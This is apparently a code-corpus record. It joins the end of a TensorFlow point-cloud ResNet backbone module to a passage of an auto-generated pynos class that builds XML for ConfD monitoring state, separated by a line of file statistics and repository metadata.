radius: ball query radius
out_fdim: output feature dim
bottleneck_ratio: bottleneck_ratio
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
float32[n_points, out_fdim]
"""
with tf.variable_scope(scope) as sc:
with tf.variable_scope('conv1'):
x = conv1d_1x1(features,
out_fdim // bottleneck_ratio,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv2'):
x = LocalAggregation(config,
query_points=inputs['points'][layer_ind],
support_points=inputs['points'][layer_ind],
neighbors_indices=inputs['neighbors'][layer_ind],
features=x,
scope='local_aggregation',
radius=radius,
out_fdim=out_fdim // bottleneck_ratio,
is_training=is_training,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv3'):
x = conv1d_1x1(x,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('shortcut'):
if int(features.shape[1]) != out_fdim:
shortcut = conv1d_1x1(features,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
else:
shortcut = features
if activation_fn == 'relu':
output = tf.nn.relu(x + shortcut)
elif activation_fn == 'leaky_relu':
output = tf.nn.leaky_relu(x + shortcut, alpha=0.2)
else:
output = x + shortcut
return output
def strided_bottleneck(layer_ind,
config,
inputs,
features,
scope,
radius,
out_fdim,
bottleneck_ratio,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""This Block performing a strided resnet bottleneck convolution (shortcut is a maxpooling)
Args:
layer_ind: layer of support points, and layer+1 is of query points
config: config file
inputs: a dict contains all inputs
features: float32[n0_points, in_fdim] - input features
scope: tensorflow scope name
radius: ball query radius
out_fdim: output feature dim
bottleneck_ratio: bottleneck_ratio
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
float32[n_points, out_fdim]
"""
if out_fdim is None:
out_fdim = features.shape[1]
with tf.variable_scope(scope) as sc:
with tf.variable_scope('conv1'):
x = conv1d_1x1(features,
out_fdim // bottleneck_ratio,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv2'):
x = LocalAggregation(config,
query_points=inputs['points'][layer_ind + 1],
support_points=inputs['points'][layer_ind],
neighbors_indices=inputs['pools'][layer_ind],
features=x,
scope='local_aggregation',
radius=radius,
out_fdim=out_fdim // bottleneck_ratio,
is_training=is_training,
init=init,
weight_decay=weight_decay,
activation_fn=activation_fn,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('conv3'):
x = conv1d_1x1(x,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
with tf.variable_scope('shortcut'):
# Pool shortcuts to strided points TODO: max_pool or closest_pool ?
shortcut = ind_max_pool(features, inputs['pools'][layer_ind], 'max_pool')
# shortcut = ind_closest_pool(features, neighbors_indices,'closest pool')
# Regular upsample of the features if not the same dimension
if int(shortcut.shape[1]) != out_fdim:
shortcut = conv1d_1x1(shortcut,
out_fdim,
scope='conv1d_1x1',
is_training=is_training,
with_bias=False,
init=init,
weight_decay=weight_decay,
activation_fn=None,
bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
if activation_fn == 'relu':
output = tf.nn.relu(x + shortcut)
elif activation_fn == 'leaky_relu':
output = tf.nn.leaky_relu(x + shortcut, alpha=0.2)
else:
output = x + shortcut
return output
def resnet_backbone(config,
inputs,
features,
base_radius,
base_fdim,
bottleneck_ratio,
depth,
is_training,
init='xavier',
weight_decay=0,
activation_fn='relu',
bn=True,
bn_momentum=0.98,
bn_eps=1e-3):
"""Resnet Backbone
Args:
config: config file
inputs: a dict contains all inputs
features: input features
base_radius: the first ball query radius
base_fdim: the base feature dim
bottleneck_ratio: bottleneck_ratio
depth: num of bottleneck in a stage
is_training: True indicates training phase
init: weight initialization method
weight_decay: If > 0, add L2Loss weight decay multiplied by this float.
activation_fn: Activation function
bn: If True, add batch norm after convolution
Returns:
A list of all stage features
"""
with tf.variable_scope('resnet_backbone') as sc:
fdim = base_fdim
radius = base_radius
layer_idx = 0
F = []
features = conv1d_1x1(features, fdim, 'res1_input_conv', is_training=is_training, with_bias=False, init=init,
weight_decay=weight_decay, activation_fn=activation_fn, bn=bn, bn_momentum=bn_momentum,
bn_eps=bn_eps)
features = simple_block(layer_idx, config, inputs, features, 'res1_simple_block',
radius=radius, out_fdim=fdim, is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum, bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res1_bottleneck{i}',
radius=radius, out_fdim=2 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res2_strided_bottleneck',
radius=radius, out_fdim=4 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res2_bottleneck{i}',
radius=2 * radius, out_fdim=4 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res3_strided_bottleneck',
radius=2 * radius, out_fdim=8 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res3_bottleneck{i}',
radius=4 * radius, out_fdim=8 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res4_strided_bottleneck',
radius=4 * radius, out_fdim=16 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res4_bottleneck{i}',
radius=8 * radius, out_fdim=16 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
layer_idx += 1
features = strided_bottleneck(layer_idx - 1, config, inputs, features, 'res5_strided_bottleneck',
radius=8 * radius, out_fdim=32 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
for i in range(depth):
features = bottleneck(layer_idx, config, inputs, features, f'res5_bottleneck{i}',
radius=16 * radius, out_fdim=32 * fdim, bottleneck_ratio=bottleneck_ratio,
is_training=is_training,
init=init, weight_decay=weight_decay, activation_fn=activation_fn, bn=bn,
bn_momentum=bn_momentum,
bn_eps=bn_eps)
F += [features]
return F
| 44.949622 | 117 | 0.479126 | 1,673 | 17,845 | 4.849372 | 0.093843 | 0.070504 | 0.059164 | 0.049304 | 0.838038 | 0.827561 | 0.819919 | 0.812523 | 0.812523 | 0.800074 | 0 | 0.014761 | 0.457103 | 17,845 | 396 | 118 | 45.063131 | 0.822667 | 0.158476 | 0 | 0.800687 | 0 | 0 | 0.035855 | 0.006247 | 0 | 0 | 0 | 0.002525 | 0 | 1 | 0.013746 | false | 0 | 0.013746 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
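`resnet_backbone` hard-codes the same pattern five times: each `strided_bottleneck` subsamples the points while the query radius and output width double from stage to stage. The multipliers it uses can be summarised with a small sketch (the `base_radius`/`base_fdim` values below are placeholders — the real ones come from the config):

```python
base_radius, base_fdim = 0.05, 64  # placeholder values, normally read from config

# Per-stage schedule used by resnet_backbone: the bottlenecks of stage s
# use radius base_radius * 2**s and output width base_fdim * 2**(s + 1).
stages = [
    {"stage": s + 1,
     "bottleneck_radius": base_radius * 2 ** s,
     "out_fdim": base_fdim * 2 ** (s + 1)}
    for s in range(5)
]

print([st["out_fdim"] for st in stages])  # [128, 256, 512, 1024, 2048]
```

Writing the schedule down like this also suggests the five near-identical stage blocks in `resnet_backbone` could be collapsed into one loop over `stages`.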
06e0a393b0d5a514a671925c327d7dee2087663c | 314,125 | py | Python | pynos/versions/ver_7/ver_7_1_0/yang/tailf_confd_monitoring.py | bdeetz/pynos | bd8a34e98f322de3fc06750827d8bbc3a0c00380 | [
"Apache-2.0"
] | 12 | 2015-09-21T23:56:09.000Z | 2018-03-30T04:35:32.000Z | pynos/versions/ver_7/ver_7_1_0/yang/tailf_confd_monitoring.py | bdeetz/pynos | bd8a34e98f322de3fc06750827d8bbc3a0c00380 | [
"Apache-2.0"
] | 10 | 2016-09-15T19:03:27.000Z | 2017-07-17T23:38:01.000Z | pynos/versions/ver_7/ver_7_1_0/yang/tailf_confd_monitoring.py | bdeetz/pynos | bd8a34e98f322de3fc06750827d8bbc3a0c00380 | [
"Apache-2.0"
] | 6 | 2015-08-14T08:05:23.000Z | 2022-02-03T15:33:54.000Z | #!/usr/bin/env python
import xml.etree.ElementTree as ET
class tailf_confd_monitoring(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def confd_state_version(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
version = ET.SubElement(confd_state, "version")
version.text = kwargs.pop('version')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_smp_number_of_threads(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
smp = ET.SubElement(confd_state, "smp")
number_of_threads = ET.SubElement(smp, "number-of-threads")
number_of_threads.text = kwargs.pop('number_of_threads')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_epoll(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
epoll = ET.SubElement(confd_state, "epoll")
epoll.text = kwargs.pop('epoll')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_daemon_status(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
daemon_status = ET.SubElement(confd_state, "daemon-status")
daemon_status.text = kwargs.pop('daemon_status')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_read_only_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
read_only_mode = ET.SubElement(confd_state, "read-only-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_upgrade_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
upgrade_mode = ET.SubElement(confd_state, "upgrade-mode")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_mode(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
mode = ET.SubElement(ha, "mode")
mode.text = kwargs.pop('mode')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
node_id = ET.SubElement(ha, "node-id")
node_id.text = kwargs.pop('node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_ha_master_node_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
ha = ET.SubElement(confd_state, "ha")
master_node_id = ET.SubElement(ha, "master-node-id")
master_node_id.text = kwargs.pop('master_node_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name = ET.SubElement(data_model, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_revision(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
revision = ET.SubElement(data_model, "revision")
revision.text = kwargs.pop('revision')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_namespace(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
namespace = ET.SubElement(data_model, "namespace")
namespace.text = kwargs.pop('namespace')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_prefix(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
prefix = ET.SubElement(data_model, "prefix")
prefix.text = kwargs.pop('prefix')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_loaded_data_models_data_model_exported_exported_to_all_exported_to_all(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
loaded_data_models = ET.SubElement(confd_state, "loaded-data-models")
data_model = ET.SubElement(loaded_data_models, "data-model")
name_key = ET.SubElement(data_model, "name")
name_key.text = kwargs.pop('name')
exported = ET.SubElement(data_model, "exported")
exported_to_all = ET.SubElement(exported, "exported-to-all")
exported_to_all = ET.SubElement(exported_to_all, "exported-to-all")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_netconf_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
netconf = ET.SubElement(confd_state, "netconf")
listen = ET.SubElement(netconf, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
ip = ET.SubElement(ssh, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_cli_listen_ssh_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
cli = ET.SubElement(confd_state, "cli")
listen = ET.SubElement(cli, "listen")
ssh = ET.SubElement(listen, "ssh")
port = ET.SubElement(ssh, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_webui_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
webui = ET.SubElement(confd_state, "webui")
listen = ET.SubElement(webui, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
ip = ET.SubElement(tcp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_tcp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
tcp = ET.SubElement(listen, "tcp")
port = ET.SubElement(tcp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
ip = ET.SubElement(ssl, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_rest_listen_ssl_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
rest = ET.SubElement(confd_state, "rest")
listen = ET.SubElement(rest, "listen")
ssl = ET.SubElement(listen, "ssl")
port = ET.SubElement(ssl, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_ip(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
ip = ET.SubElement(udp, "ip")
ip.text = kwargs.pop('ip')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_listen_udp_port(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
listen = ET.SubElement(snmp, "listen")
udp = ET.SubElement(listen, "udp")
port = ET.SubElement(udp, "port")
port.text = kwargs.pop('port')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v1(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v1 = ET.SubElement(version, "v1")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v2c(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v2c = ET.SubElement(version, "v2c")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_version_v3(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
version = ET.SubElement(snmp, "version")
v3 = ET.SubElement(version, "v3")
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_snmp_engine_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
snmp = ET.SubElement(confd_state, "snmp")
engine_id = ET.SubElement(snmp, "engine-id")
engine_id.text = kwargs.pop('engine_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id = ET.SubElement(callpoint, "id")
id.text = kwargs.pop('id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
id = ET.SubElement(daemon, "id")
        # the 'id' kwarg was already popped for the callpoint key above;
        # a second pop would raise KeyError, so reuse the same value
        id.text = id_key.text
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
name = ET.SubElement(daemon, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_daemon_daemon_error(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
daemon = ET.SubElement(registration_type, "daemon")
daemon = ET.SubElement(daemon, "daemon")
error = ET.SubElement(daemon, "error")
error.text = kwargs.pop('error')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_path(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
path = ET.SubElement(range, "path")
path.text = kwargs.pop('path')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_lower(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
range = ET.SubElement(range, "range")
lower = ET.SubElement(range, "lower")
lower.text = kwargs.pop('lower')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def confd_state_internal_callpoints_callpoint_registration_type_range_range_upper(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
confd_state = ET.SubElement(config, "confd-state", xmlns="http://tail-f.com/yang/confd-monitoring")
internal = ET.SubElement(confd_state, "internal")
callpoints = ET.SubElement(internal, "callpoints")
callpoint = ET.SubElement(callpoints, "callpoint")
id_key = ET.SubElement(callpoint, "id")
id_key.text = kwargs.pop('id')
registration_type = ET.SubElement(callpoint, "registration-type")
range = ET.SubElement(registration_type, "range")
